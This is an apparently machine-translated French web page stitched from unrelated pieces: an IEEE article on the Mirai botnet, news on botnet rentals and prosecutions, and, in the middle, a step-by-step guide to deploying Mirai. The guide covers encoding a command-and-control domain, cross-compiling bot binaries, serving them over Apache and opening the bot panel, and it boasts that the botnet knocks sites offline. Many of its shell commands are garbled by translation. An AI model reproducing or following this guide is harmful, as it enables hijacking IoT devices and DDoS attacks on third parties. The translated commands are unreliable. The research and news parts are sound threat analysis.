Sécurité 

Code source de Mirai. Les botnets IoT Mirai et Gafgyt ont ciblé le secteur des entreprises. Principe de fonctionnement du Mirai

Avec la popularité et l’ampleur croissantes de l’Internet des objets, ses appareils ont commencé à être utilisés par les attaquants comme plate-forme pour lancer de puissantes cyberattaques. La gravité et le nombre d’incidents de sécurité très médiatisés impliquant de tels appareils ont montré qu’ils constituent le maillon le plus faible de la chaîne de sécurité des réseaux informatiques modernes. Et bien que la puissance de calcul de la plupart des sujets liés à l'Internet des objets soit loin des capacités d'un PC, son manque est compensé par le nombre d'appareils regroupés en un seul tout. Tous sont constamment connectés au réseau et, souvent, fonctionnant en configuration d'usine, ils deviennent un morceau savoureux pour les pirates. Le grand nombre, la large diffusion et la faible sécurité des appareils Internet des objets ont déjà attiré de nombreux attaquants qui les utilisent activement pour lancer des attaques DDoS.

Le « futur » est déjà là

Un exemple récent bien connu est le botnet Mirai (en japonais pour « futur »). Note éd.), découvert pour la première fois en août 2016 par le groupe de recherche MalwareMustDie. Le malware lui-même, ainsi que ses nombreuses variantes et imitateurs, sont devenus la source des attaques DDoS les plus puissantes de l’histoire du secteur informatique.

En septembre 2016, le site Web du consultant en sécurité informatique Brian Krebs a commencé à recevoir un trafic de 620 Gbit/s, un ordre de grandeur supérieur au niveau auquel la plupart des sites Web tombent en panne. À peu près au même moment, une attaque DDoS Mirai encore plus puissante (1,1 Tbps) a frappé OVH, un fournisseur français d'hébergement Web et de services cloud. Bientôt, le code source du malware a été publié, après quoi les attaquants ont commencé à louer des botnets basés sur celui-ci, contenant jusqu'à 400 000 appareils. S'ensuit une série d'attaques Mirai, dont la plus célèbre, organisée contre le fournisseur de services Dyn, a désactivé des centaines de sites pendant plusieurs heures en octobre 2016, parmi lesquels Twitter, Netflix, Reddit et GitHub.

Mirai se propage généralement en infectant d'abord les webcams, les DVR, les routeurs, etc. qui exécutent une version de BusyBox. Le malware découvre ensuite les informations d'identification administratives d'autres appareils IoT par simple force brute, à l'aide d'un petit dictionnaire de paires nom-mot de passe typique des fabricants d'appareils réseau.

Par la suite, les mutations Mirai ont commencé à apparaître littéralement quotidiennement, et le fait qu’elles aient conservé la capacité de se reproduire et de causer des dommages en utilisant les mêmes méthodes que l’original indique une négligence chronique des fabricants d’appareils IoT pour les méthodes de protection simples. Curieusement, les botnets formés à partir de tels appareils ont fait l'objet de peu de recherches, malgré le risque que des attaques de plus en plus sophistiquées basées sur ces dispositifs puissent potentiellement miner l'ensemble de l'infrastructure Internet.

Principe de fonctionnement du Mirai

Mirai lance une attaque DDoS contre les serveurs cibles en se propageant activement via des appareils IoT avec une configuration non sécurisée.

Principaux composants

Le botnet Mirai se compose de quatre composants principaux. Un bot est un malware qui infecte les appareils et propage « l’infection » parmi les appareils mal configurés, puis attaque le serveur cible dès réception de la commande appropriée du botmaster – la personne qui contrôle les robots. Le serveur de commande et de contrôle fournit au botmaster une interface qui lui permet de vérifier l'état du botnet et de lancer de nouvelles attaques DDoS. La communication entre les éléments de l'infrastructure du botnet s'effectue généralement via le réseau Tor anonyme. Le téléchargeur assure la distribution de fichiers exécutables pour toutes les plateformes matérielles (18 au total, dont ARM, MIPS, x86, etc.) grâce à un contact direct avec les nouvelles victimes. Le serveur de reporting gère une base de données d'informations sur tous les appareils du botnet, et les nœuds nouvellement infectés communiquent généralement directement avec ce serveur.

Schéma d'activité et de communication dans un botnet

Mirai analyse d'abord les ports 23 et 2323 à l'aide d'adresses IP publiques aléatoires. Certaines adresses sont exclues (probablement pour ne pas attirer l'attention des agences gouvernementales) - par exemple celles appartenant au service postal américain, au Pentagone, à l'IANA, ainsi qu'à General Electric et Hewlett-Packard. Sur la fig. La figure 1 montre les principales étapes de l'activité et de l'échange de données dans un botnet.

Étape 1. Le bot effectue une attaque par force brute, découvrant les informations d'identification des appareils IoT dont les paramètres d'usine n'ont pas été modifiés. Il existe 62 paires nom d'utilisateur-mot de passe possibles dans le dictionnaire Mirai.

Étape 2. Après avoir détecté les informations d'identification opérationnelles et accédé à la ligne de commande ou à l'interface utilisateur graphique de l'appareil, le bot transmet ses caractéristiques au serveur de reporting via un autre port.

Étape 3. Le botmaster vérifie régulièrement les cibles potentielles et l'état actuel du botnet en communiquant avec le serveur de reporting via Tor.

Étape 4. Après avoir sélectionné les appareils vulnérables à infecter, le botmaster envoie les commandes appropriées au chargeur de démarrage avec tous les détails nécessaires, y compris les adresses IP et les informations sur l'architecture matérielle.

Étape 5. Le téléchargeur pénètre dans le système de l'appareil vulnérable et l'oblige à télécharger et à exécuter le fichier exécutable du malware correspondant. En règle générale, le téléchargement s'effectue à l'aide de l'utilitaire GNU Wget utilisant le protocole TFTP. Il est à noter qu'une fois lancé, le malware tente de se protéger des concurrents en bloquant les ports via lesquels les infections se produisent souvent, notamment Telnet et SSH. A ce stade, l'instance de bot nouvellement créée peut déjà communiquer avec le serveur de contrôle et en recevoir des commandes pour lancer une attaque. Cela se fait en résolvant le nom de domaine codé en dur dans l'exécutable (la valeur par défaut dans Mirai est cnc.changeme.com). Cette méthode, utilisée à la place d'accéder directement à l'adresse IP, permet au botmaster de modifier les adresses IP du serveur de commande et de contrôle sans modifier les fichiers binaires et sans échange d'informations supplémentaires.

Étape 6. Le botmaster commande à toutes les instances de bot de lancer une attaque contre le serveur cible, en transmettant les paramètres appropriés via le serveur de contrôle, notamment le type et la durée de l'attaque, ainsi que les adresses IP du serveur lui-même et des instances de bot.

Étape 7. Les robots commencent à attaquer la cible en utilisant l'une des douzaines de méthodes disponibles, notamment l'inondation à l'aide des protocoles Generic Routing Encapsulation, TCP et HTTP.

Caractéristiques de Mirai

Contrairement à d’autres logiciels malveillants similaires, Mirai ne tente pas d’échapper à la détection. Presque toutes les étapes de l'infection présentent des signes caractéristiques qui peuvent être reconnus à l'aide d'une simple analyse du réseau : énumération de certaines informations d'identification via certains ports ; envoyer des rapports spécialement compilés ; télécharger des fichiers binaires représentatifs ; messagerie pour maintenir la connexion ; transmission d'ordres de contrôle avec une structure caractéristique ; absence presque totale d'éléments aléatoires dans le trafic d'attaque.

Sur la fig. La figure 2 montre les modes de communication standard entre le chargeur de démarrage Mirai et un appareil IoT déjà infecté mais n'ayant pas encore lancé d'attaque. La durée des sessions varie, mais les types et tailles de paquets, ainsi que la séquence des messages, suivent des modèles qui indiquent une infection par ce malware particulier.

Variantes de Mirai

Il semblerait que la publication du code source de Mirai et son bruit en ligne relativement fort auraient dû conduire à l'émergence rapide de mécanismes efficaces de reconnaissance et de protection. Cependant, cela ne s'est pas produit : deux mois seulement après la publication du code source, le nombre d'instances de robots a plus que doublé, passant de 213 000 à 493 000, et un grand nombre de ses variantes sont apparues. Même plus d’un an après la découverte de Mirai, les robots utilisaient toujours des configurations faibles des mêmes types d’appareils que ceux utilisés à l’origine.

La plupart des infections Mirai se produisent sur les ports TCP 23 ou 2323, mais en novembre 2016, des souches du virus ont été découvertes accédant à d'autres ports, notamment 7547, que les FAI utilisent pour gérer à distance les routeurs des clients. Le même mois, l'une de ces variantes de Mirai a laissé près d'un million d'abonnés de Deutsche Telekom sans accès au réseau.

En février 2017, une variante de Mirai a été utilisée pour lancer une attaque DDoS de 54 heures contre une université américaine. Le mois suivant, une autre variante est apparue, cette fois avec des capacités intégrées d’extraction de Bitcoin, bien que les estimations suggèrent que l’utilisation d’appareils IoT à cette fin ne générerait probablement pas beaucoup de revenus.

En avril, Persirai, un autre botnet créé à partir de la base de code Mirai, a commencé ses activités. Ce réseau zombie a été découvert par les chercheurs de Trend Micro, qui l'ont nommé en combinant les mots Persan et Mirai – le premier a été choisi en tenant compte de l'origine iranienne supposée du malware. Il tente d'accéder à l'interface de contrôle de certains fabricants de webcams sur le port TCP 81. En cas de succès, il infiltre le routeur à l'aide d'une vulnérabilité du protocole UPnP, puis télécharge, exécute et supprime des fichiers binaires supplémentaires. Au lieu de trouver les informations d'identification pour accéder à l'interface de la caméra par force brute, le virus utilise une faille zero-day qui vous permet d'obtenir directement le fichier de mots de passe. Une attaque DoS distribuée est effectuée par inondation via le protocole UDP. Selon les estimations, il y avait environ 120 000 appareils sur Internet vulnérables à Persirai.

Autres botnets basés sur l'IoT

S'appuyant sur les principes de base de Mirai, les créateurs de nouveaux logiciels malveillants ont commencé à utiliser d'autres mécanismes plus complexes pour augmenter la puissance et dissimuler l'activité des réseaux zombies.

En août 2016, des chercheurs de l'organisation MalwareMustDie ont signalé le premier botnet basé sur l'IoT créé à l'aide du langage de script Lua. La majeure partie de l’armée des botnets était composée de modems câble équipés de processeurs ARM exécutant Linux. Le malware a des fonctions complexes - par exemple, il crée un canal d'échange de données crypté avec le serveur de contrôle et définit des règles iptables spéciales pour protéger les appareils infectés des concurrents.

Le botnet Hajime, découvert en octobre 2016 par Rapidity Networks, utilise une méthode d'infection similaire à Mirai. Mais au lieu d'une architecture centralisée, Hajime s'appuie sur un système de communication distribué, utilisant le protocole BitTorrent Distributed Hash Tag (DHT) pour découvrir ses pairs (utilisateurs du réseau homologue) et utilise le protocole de transport uTorrent pour échanger des données. Tous les messages sont cryptés grâce au protocole RC4. Jusqu’à présent, Hajime n’a montré aucun côté négatif, mais s’attaque plutôt aux sources potentielles de vulnérabilités des appareils de l’Internet des objets utilisés par des botnets comme Mirai, ce qui a conduit à des spéculations selon lesquelles il aurait été créé par un certain « Robin des Bois ». Cependant, le véritable objectif du botnet reste un mystère.

Le botnet BrickerBot, qui, comme Mirai, infecte le logiciel BusyBox, a été découvert par les experts de Radware en avril 2017. En utilisant les informations d'identification par défaut définies dans le service SSH, ainsi que des configurations erronées et des vulnérabilités connues, le malware tente de lancer des attaques par déni de service permanent (PDoS) contre les appareils IoT, c'est-à-dire suffisamment destructrices pour forcer la reconfiguration ou le remplacement de l'équipement. BrickerBot corrompt le micrologiciel de l'appareil, supprime les fichiers qu'il contient et modifie les paramètres réseau.

Leçons

Les dégâts considérables causés par les attaques de Mirai, de ses variantes et de botnets similaires ont clairement démontré les risques que les appareils Internet des objets représentent pour le World Wide Web. Aujourd’hui, des virus assez simples sont capables de prendre le contrôle de tels appareils et de créer d’immenses armées destructrices de « zombies ». Les attaquants sont attirés par la facilité avec laquelle il est possible de développer une population de robots. Il existe cinq raisons principales pour lesquelles les appareils IoT sont particulièrement avantageux pour créer des botnets.

  1. Activité constante et sans entrave. Contrairement aux ordinateurs portables et de bureau, qui sont fréquemment allumés et éteints, de nombreux appareils IoT (comme les webcams et les routeurs Wi-Fi) fonctionnent 24 heures sur 24 et 7 jours sur 7 et sont souvent perçus par leurs propriétaires comme des appareils qui ne peuvent pas être infectés.
  2. Manque de protection. Dans leur précipitation à pénétrer le marché de l’IoT, de nombreux fabricants d’appareils négligent la sécurité au profit de la commodité et de la facilité d’utilisation.
  3. Manque de contrôle. La plupart des appareils IoT sont utilisés selon le principe « configurez-le et oubliez-le » : après la configuration initiale, les administrateurs système ne peuvent y prêter attention que s'ils cessent de fonctionner correctement.
  4. Trafic d’attaque impressionnant. Les appareils IoT d'aujourd'hui sont puissants et bien placés pour générer un trafic d'attaque DDoS aussi puissant que les ordinateurs de bureau actuels.
  5. Interfaces utilisateur non interactives ou peu interactives.Étant donné que les appareils IoT nécessitent généralement une intervention minimale de l’utilisateur, les infections sont susceptibles de passer inaperçues. Mais même si cela est remarqué, les utilisateurs n’ont pas de moyen simple d’éliminer le malware, à moins de remplacer physiquement l’appareil.

L’émergence d’attaques DDoS menées par des appareils IoT est prévue depuis longtemps, et aujourd’hui, le nombre de variantes et de copies de Mirai de plus en plus sophistiquées augmente à un rythme alarmant. De tels logiciels malveillants sont généralement capables de fonctionner sur de nombreuses plates-formes et, se caractérisant par une faible consommation de ressources, peuvent se contenter d'un minimum de RAM. De plus, la procédure d’infection est relativement simple, ce qui fait de tout appareil vulnérable un candidat pour devenir un zombie, même s’il est fréquemment redémarré. La plupart des malwares IoT existants sont faciles à détecter et à analyser, mais les nouveaux robots deviennent de plus en plus furtifs.

En règle générale, la majeure partie de la responsabilité des attaques DDoS incombe aux utilisateurs eux-mêmes et aux administrateurs système qui négligent les précautions de base. Cependant, dans le cas des botnets IoT, l’entière responsabilité incombe aux fabricants qui fabriquent des produits faiblement protégés avec des paramètres d’accès à distance installés en usine. De plus, seuls les fabricants d’appareils IoT ont la possibilité de fournir automatiquement des mises à jour de sécurité propriétaires qui protègent contre les infections. Les techniques de sécurité conventionnelles qui nécessitent une intervention manuelle, comme le changement fréquent des mots de passe, ne sont pas possibles pour les appareils IoT, car le comportement réseau de ces appareils est basé sur le principe d'autorégulation. Par conséquent, l’Internet des objets d’aujourd’hui nécessite des contrôles de sécurité techniques, ainsi que des normes réfléchies de sécurité des appareils qui doivent être respectées par tous les fournisseurs.

Geoffroy Voas ( [email protégé]) est membre de l'IEEE.

Constantinos Kolias, Georgios Kambourakis, Angelos Stavrou, Jefrey Voas, DDoS dans l'IoT : Mirai et autres botnets. IEEE Computer, juillet 2017, IEEE Computer Society. Tous droits réservés. Reproduit avec autorisation.


Je ne dirai pas grand-chose, je dirai juste que le logiciel fonctionne et désactive les sites en trombe. Et c'est le premier manuel russe pour installer Mirai. "Conneries historiques"

Nous aurons besoin de deux serveurs VPS KVM et d'un domaine. La virtualisation est KVM, OpenVZ manque cette fois.
Nous installerons le botnet lui-même sur un serveur et analyserons les robots sur le second. (brutal)
J'ai pris les serveurs ici - https://www.nforce.com/
Il n’y a eu aucun problème, aucune interdiction.
Pour ceux qui veulent juste voir comment les choses se passent là-bas, vous pouvez tester les serveurs ici - https://adminvps.ru/
IMPORTANT. Les serveurs doivent être basés sur Debian 8 et disposer d'au moins 1 Go de RAM.
N’importe quel domaine, peu importe.
Désolé, bien sûr, mais je ne vous expliquerai pas comment attacher un domaine à un VPS. Ce n'est pas difficile, vous le découvrirez vous-même.
Nous nous connectons à notre serveur via PuTTY et commençons.

# apt-get mise à jour -y
# apt-get mise à niveau -y
# apt-get install décompressez l'écran de clôture électrique gcc golang sudo git -y
# apt-get install serveur-mysql -y
# apt-get install client-mysql -y
# apt-get install apache2 -y
Lors de l'installation de MySQL, vous devrez créer un mot de passe pour accéder à MySQL pour l'utilisateur root. Vous obtiendrez un mot de passe normal, sans aucun « qwerty »
Écrivez-le quelque part, nous en aurons encore besoin.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
#frapper< <(curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer)
# gvm installe go1.4
# gvm utilise go1.4 [--default]
# gvm installe go1.4 -B
# gvm utilise go1.4
# export GOROOT_BOOTSTRAP=$GOROOT
# gvm installe go1.5
# gvm utilise go1.5
# gvm installe go1.8
# gvm utilise go1.8

Après avoir installé tous les utilitaires, téléchargez le code source du bot et téléchargez-le sur le serveur. En utilisant la commande wget, ou simplement via le programme WinSCP.
# décompressez Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc string vlmi.su (nous écrivons notre propre domaine, qui est attaché au serveur) et appuyez sur Entrée
Ici, vous verrez le texte suivant -
XOR" sur 14 octets de données...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
14 - vous aurez ici un numéro différent, alors ne vous inquiétez pas, tout est correct.
Nous copions tout ce texte.
Ouvrez le fichier table.c via l'éditeur nano, ou via WinSCP, qui se trouve dans le dossier mirai/bot
Doit voir ça - https://prnt.sc/gcxa2m
La ligne add_entry(TABLE_CNC_DOMAIN - nous changeons tout entre guillemets dans notre texte que nous venons de copier. Au lieu de « 30 » nous écrivons notre numéro, que nous venons également de copier. Nous faisons de même avec la ligne add_entry(TABLE_SCAN_CB_DOMAIN
Enregistrez et fermez l'éditeur.
Passons à autre chose.
Ouvrez le fichier mirai/cnc/main.go avec un éditeur
Nous voyons cela - https://prnt.sc/gcxdtz
"127.0.0.1" est remplacé par "127.0.0.1:3306".
«mot de passe», nous remplaçons notre mot de passe MySQL que nous avons entré plus tôt. "
Enregistrez le fichier et fermez l'éditeur.
Copiez simplement toutes ces conneries, je ne vous dirai pas pourquoi c'est nécessaire -

# mkdir /etc/xcompile
# cd /etc/xcompile

# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2

# mv cross-compiler-armv4l armv4l
# mv cross-compiler-i586 i586
#mv compilateur croisé-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compilateur-sh4 sh4
# mv cross-compiler-sparc sparc
# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin
# export GOPATH=$HOME/Documents/go

# allez chercher github.com/go-sql-driver/mysql
# allez chercher github.com/mattn/go-shellwords
Foutu.

# cd Mirai-Source-Code-master/mirai
# ./build.sh débogage telnet
# ./build.sh publie telnet

# mv mirai* /var/www/html
# cd /var/www/html
#mkdirbins
#mv*bacs/
#CD

Maintenant MySQL.
# mysql -u racine -p
Ici, il vous sera demandé un mot de passe. Saisissez le mot de passe que vous avez défini précédemment.
# créer une base de données Mirai ;
# utiliser Mirai
Copiez maintenant tout le texte d'ici - collez-le https://pastebin.com/QVD48J8s et appuyez sur Entrée.
Copiez le texte d'ici - https://pastebin.com/JwYSgE4v
Au lieu de anna-senpai, nous écrivons notre nom d'utilisateur. N'importe lequel. Pareil avec mon mot de passe génial. Nous aurons besoin de ces données pour accéder au panneau de contrôle du bot.
Cela devrait être comme ceci - INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");
Copiez, collez, appuyez sur Entrée.
Maintenant tu peux sortir.
# sortie
C'est presque terminé.
# cd Mirai-Source-Code-master/mirai/release
# toucher prompt.txt
# écran ./cnc
Vous devriez voir le message MySQL DB ouvert
On ne ferme pas cette session, on en ouvre une nouvelle.
http://prntscr.com/gcxunx au lieu de vlmi.su, écrivez votre domaine et cliquez sur Ouvrir.
Entrez votre nom d'utilisateur et votre mot de passe, dans mon cas c'est -
pizdec
zaebalsjapisatj
Ça y est, nous sommes dans le panneau de contrôle du bot.

À la base, Mirai fonctionne simplement : il analyse Internet à la recherche d'appareils IoT accessibles via telnet et vulnérables à la force brute et au piratage. Le malware attaque principalement les caméras de surveillance, les DVR et les routeurs, puis continue de se multiplier comme un ver.

Des attaques DDoS menées récemment par ce botnet et le plus important d'Europe. La puissance d’attaque maximale a atteint 620 Gbit/s et plus de 1 Tb/s. Pour obtenir de tels résultats, les attaquants ont utilisé des inondations UDP, DNS et HTTP, ainsi que des paquets GRE (Generic Routing Encapsulation), que les experts ont reconnus comme très inhabituels.

Les conclusions des spécialistes de MalwareTech coïncident généralement avec ces observations. Ainsi, sur une période de douze heures, les chercheurs ont enregistré environ 72 000 adresses IP uniques, et 4 000 nouvelles adresses IP sont apparues chaque heure. Les analystes en ont conclu que la taille du botnet est très modeste : seulement environ 120 000 appareils par jour. Et bien que le réseau de zombies soit beaucoup plus vaste et compte entre 1 et 1,5 million de robots, ni les chercheurs de MalwareTech ni les spécialistes d'Akamai ne sont d'accord avec cette affirmation.

"Mirai, qui était auparavant largement ignoré en raison de la simplicité des attaques telnet, est devenu la semaine dernière un sujet de discussion majeur dans les médias du monde entier, les forces de l'ordre ayant lancé des enquêtes, avec le soutien de nombreuses entreprises internationales", écrivent les chercheurs. . « Il est probable que les puissantes attaques DDoS deviendront désormais une pratique plus courante à mesure que les pirates découvrent de plus en plus d'appareils IoT vulnérables ou commencent à infecter des appareils protégés par NAT. Il est définitivement temps pour les fabricants d'arrêter de publier des appareils avec des mots de passe globaux par défaut et de passer à des appareils avec des mots de passe générés aléatoirement au bas du boîtier. »

En plus du rapport, les chercheurs de MalwareTech ont inclus une vidéo montrant une carte des infections Mirai (voir ci-dessous). Sur le site Web des chercheurs, vous trouverez également une carte interactive du botnet, mise à jour en temps réel.

Le mois dernier, des attaques ont eu lieu contre de grands sites comme Gazouillement ou Spotify, qui les a temporairement désactivés. Un botnet a été utilisé pour cela Mirai, réunissant 400 à 500 000 appareils Internet des objets. Les journalistes de Carte mère ont appris que deux pirates ont réussi à prendre le contrôle du botnet et à en créer une nouvelle version - il fédère déjà un million d'appareils. Les abonnés du fournisseur allemand ont expérimenté sa puissance Deutsche Telekom, dont le réseau était en panne le week-end dernier.

À la recherche de Mirai

Les journalistes ont réussi à parler à l'un de ces deux mystérieux hackers - il utilise le surnom de BestBuy. Dans une conversation en ligne cryptée, il leur a déclaré qu'il y avait une véritable lutte entre les pirates pour le contrôle de Mirai. Une vulnérabilité a été récemment découverte dans son logiciel. Son utilisation, couplée à sa rapidité, pourrait permettre à BestBuy et à son partenaire Popopret de prendre le contrôle de la majeure partie du botnet et d'y ajouter de nouveaux appareils.

Auparavant, nos experts ont étudié le code du botnet Mirai - il s'est avéré qu'il n'avait pas été créé spécifiquement pour les appareils Internet des objets. Les logiciels malveillants recherchent les appareils connectés au réseau avec des identifiants et des mots de passe par défaut (admin:admin, root:password, etc.). Cela signifie que, en théorie, cela peut inclure n’importe quel appareil, y compris les ordinateurs personnels, les serveurs ou les routeurs.

Appareils IoT- généralement des routeurs - inclus dans Botnet Mirai jusqu'à ce qu'il redémarre - le ver est alors effacé de leur mémoire. Cependant, le botnet analyse constamment Internet à la recherche d’appareils vulnérables, afin qu’un appareil « guéri » puisse rapidement en faire à nouveau partie. Il existe une véritable course entre les hackers pour être les premiers à infecter le plus d’appareils possible.

Il n'y a aucune information sur la manière dont les créateurs de la nouvelle Mirai parviennent à dépasser leurs concurrents. Cependant, ils ont déclaré aux journalistes qu'ils utilisaient leur propre botnet pour analyser les appareils potentiellement vulnérables, y compris ceux qui faisaient auparavant partie du botnet.

"Pourquoi ne pas laisser le Mirai chasser le Mirai et dévorer l'original", déclare BestBuy.

Pas seulement Mirai

Cependant, le nouveau botnet n’a pas seulement absorbé les anciens appareils Mirai et les nouveaux dotés de mots de passe par défaut. Ses créateurs utilisent également des vulnérabilités de type 0-day dans le firmware des appareils IoT. Les experts avaient déjà prédit l’émergence imminente de tels botnets « combinés ».

La lutte contre eux devient sensiblement plus compliquée - si pour contrer Mirai, l'utilisateur de l'appareil final n'a besoin que de modifier le login et le mot de passe pour y accéder, il ne pourra alors pas faire face seul aux vulnérabilités du gadget. .

DDoS à 700 Gbit/s

Les hackers BestBuy et Popopret ont commencé à faire la publicité de leurs services : ils offrent l'accès à leur nouvelle version de Mirai en envoyant des messages spam via XMPP/Jabber.

Selon le hacker, ils proposent à leurs clients plusieurs packages de services. Le moins cher en vaut la peine $2 000 - pour cet argent, les clients peuvent louer 20 000 à 25 000 nœuds de botnet pour lancer des sentinelles pendant deux semaines maximum, avec un temps de pause de quinze minutes entre les attaques. Pour $15 000 ou $20 000 les clients ont désormais la possibilité de demander à 600 000 robots de lancer des attaques de deux heures avec des pauses de 30 ou 15 minutes. Dans le deuxième cas, la puissance d'attaque sera 700 Gbit/s ou plus.

Perspectives

Sécurité Appareils IoT est souvent à un niveau assez bas - cela s'explique par le fait que les fournisseurs ne sont souvent pas intéressés par la mise en œuvre de mesures supplémentaires de sécurité des informations. Ils vantent la facilité d'utilisation de leurs produits, mais toutes les mesures de sécurité supplémentaires imposent des restrictions et nécessitent des ressources.

Comme indiqué ci-dessus, seuls les développeurs d'appareils finaux ou les fournisseurs qui les fournissent (dans le cas des routeurs) peuvent protéger les utilisateurs contre les botnets plus avancés. Le fournisseur allemand Deutsche Telekom, touché par l'attaque de la nouvelle version de Mirai, a déjà annoncé qu'il « reconsidérerait ses relations commerciales » avec les fournisseurs de routeurs vulnérables Port rapide, entreprise Arcadien.

À terme, il sera possible d'augmenter le niveau de sécurité de l'Internet des objets grâce à l'introduction d'un contrôle plus strict des appareils de la part des fournisseurs, d'une part, et au développement de normes et de documents réglementaires pour l'IoT, d'autre part. Des mesures similaires ont déjà été prises dans de nombreux pays pour garantir la sécurité des systèmes automatisés de contrôle des processus. Les premiers pas dans cette direction ont déjà été faits - par exemple, plusieurs fournisseurs informatiques ont publié en septembre un document intitulé Le cadre de sécurité de l’Internet industriel (IISF)- il propose de considérer l'Internet des objets comme faisant partie de « l'Internet industriel ».

Cependant, le problème est encore loin d'être définitivement résolu, et les pirates BestBuy et Popopret peut obtenir un monopole sur une grande échelle Attaques DDoS en ligne. C'est une réalité plutôt triste, mais les cambrioleurs eux-mêmes, lors d'une conversation avec Carte mère ont déclaré que leurs activités seraient guidées non seulement par le profit, mais aussi par des principes moraux. BestBuy a donc déclaré qu'il ne permettrait pas aux clients d'attaquer les adresses IP des entreprises travaillant avec des infrastructures critiques.

Les attaques du botnet Mirai contre le fournisseur DNS américain Dyn en 2016 ont suscité un large écho et attiré une attention accrue sur les botnets. Cependant, comparées à la manière dont les cybercriminels modernes utilisent les botnets aujourd’hui, les attaques contre Dyn peuvent ressembler à des farces enfantines. Les criminels ont rapidement appris à utiliser les botnets pour lancer des logiciels malveillants sophistiqués capables de créer des infrastructures entières d'ordinateurs infectés et d'autres appareils connectés à Internet afin de générer des profits illicites à grande échelle.

Ces dernières années, les forces de l’ordre ont fait des progrès dans la lutte contre les activités criminelles liées à l’utilisation des botnets, mais ces efforts ne suffisent certainement pas à créer une brèche suffisante dans les botnets exploités par les cybercriminels. Voici quelques exemples célèbres :

  • Le ministère américain de la Justice a inculpé deux jeunes hommes pour leur rôle dans le développement et l'utilisation du botnet Mirai : Paras Jha, 21 ans, et Joshua White, 20 ans. Ils sont accusés d’avoir organisé et mené des attaques DDoS contre des entreprises, puis d’exiger une rançon pour les arrêter, ainsi que de vendre des « services » à ces entreprises pour empêcher des attaques similaires à l’avenir.
  • Les autorités espagnoles, dans le cadre d'une opération transfrontalière à la demande des États-Unis, ont arrêté un habitant de Saint-Pétersbourg, Peter Levashov, connu dans les milieux cybercriminels sous le nom de Peter Severa. Il dirigeait Kelihos, l'un des réseaux de zombies les plus anciens sur Internet, qui aurait infecté environ 100 000 ordinateurs. En plus de l'extorsion, Petr Levashov a activement utilisé Kelihos pour organiser des envois de spam, facturant entre 200 et 500 dollars par million de messages.
  • L’année dernière, deux adolescents israéliens ont été arrêtés pour avoir organisé des attaques DDoS contre rémunération. Le couple a réussi à gagner environ 600 000 dollars et à mener environ 150 000 attaques DDoS.

Les botnets sont des réseaux informatiques constitués d'un grand nombre d'ordinateurs ou d'autres appareils connectés à Internet, sur lesquels, à l'insu de leurs propriétaires, des logiciels autonomes - des bots - sont téléchargés et lancés. Il est intéressant de noter que les robots eux-mêmes ont été développés à l’origine comme des outils logiciels permettant d’automatiser des tâches répétitives et non criminelles. Ironiquement, l'un des premiers robots à succès, connu sous le nom d'Eggdrop, créé en 1993, a été conçu pour gérer et protéger les canaux IRC (Internet Relay Chat) contre les tentatives de prise de contrôle par des tiers. Mais les éléments criminels ont rapidement appris à exploiter la puissance des botnets, en les utilisant comme des systèmes mondiaux, virtuellement automatisés et générateurs de profits.

Au cours de cette période, les logiciels malveillants des réseaux de zombies se sont considérablement développés et peuvent désormais utiliser diverses méthodes d'attaque se produisant simultanément dans plusieurs directions. En outre, la « bot economy » semble extrêmement attractive du point de vue des cybercriminels. Tout d'abord, il n'y a pratiquement aucun coût d'infrastructure, puisque pour organiser un réseau de machines infectées, des ordinateurs compromis et d'autres équipements ayant accès à Internet sont utilisés, bien entendu, à l'insu des propriétaires de ces appareils. Cette absence d'investissement dans les infrastructures signifie que les profits des criminels seront effectivement égaux à leurs revenus provenant d'activités illégales. Outre la possibilité d’utiliser une telle infrastructure « rentable », l’anonymat est également extrêmement important pour les cybercriminels. Pour ce faire, ils utilisent principalement des cryptomonnaies « intraçables » comme le Bitcoin lorsqu’ils demandent une rançon. Pour ces raisons, les botnets sont devenus la plateforme privilégiée pour la cybercriminalité.

Du point de vue de la mise en œuvre de divers modèles économiques, les botnets constituent une excellente plate-forme pour lancer diverses fonctionnalités malveillantes qui rapportent des revenus illégaux aux cybercriminels :

  • Distribution rapide et à grande échelle d’e-mails de rançongiciels exigeant une rançon.
  • En tant que plateforme pour augmenter le nombre de clics sur un lien.
  • Ouverture de serveurs proxy pour un accès Internet anonyme.
  • Tenter de pirater d'autres systèmes Internet en utilisant des méthodes de force brute (ou « force brute »).
  • Effectuer des envois massifs d'e-mails et héberger de faux sites pour du phishing à grande échelle.
  • Retrait des clés CD ou d'autres données de licence de logiciel.
  • Vol d’informations d’identification personnelles.
  • Obtenez des informations sur votre carte de crédit et d'autres comptes bancaires, y compris des codes PIN ou des mots de passe « secrets ».
  • Installation de keyloggers pour capturer toutes les données que l'utilisateur saisit dans le système.

Comment créer un botnet ?

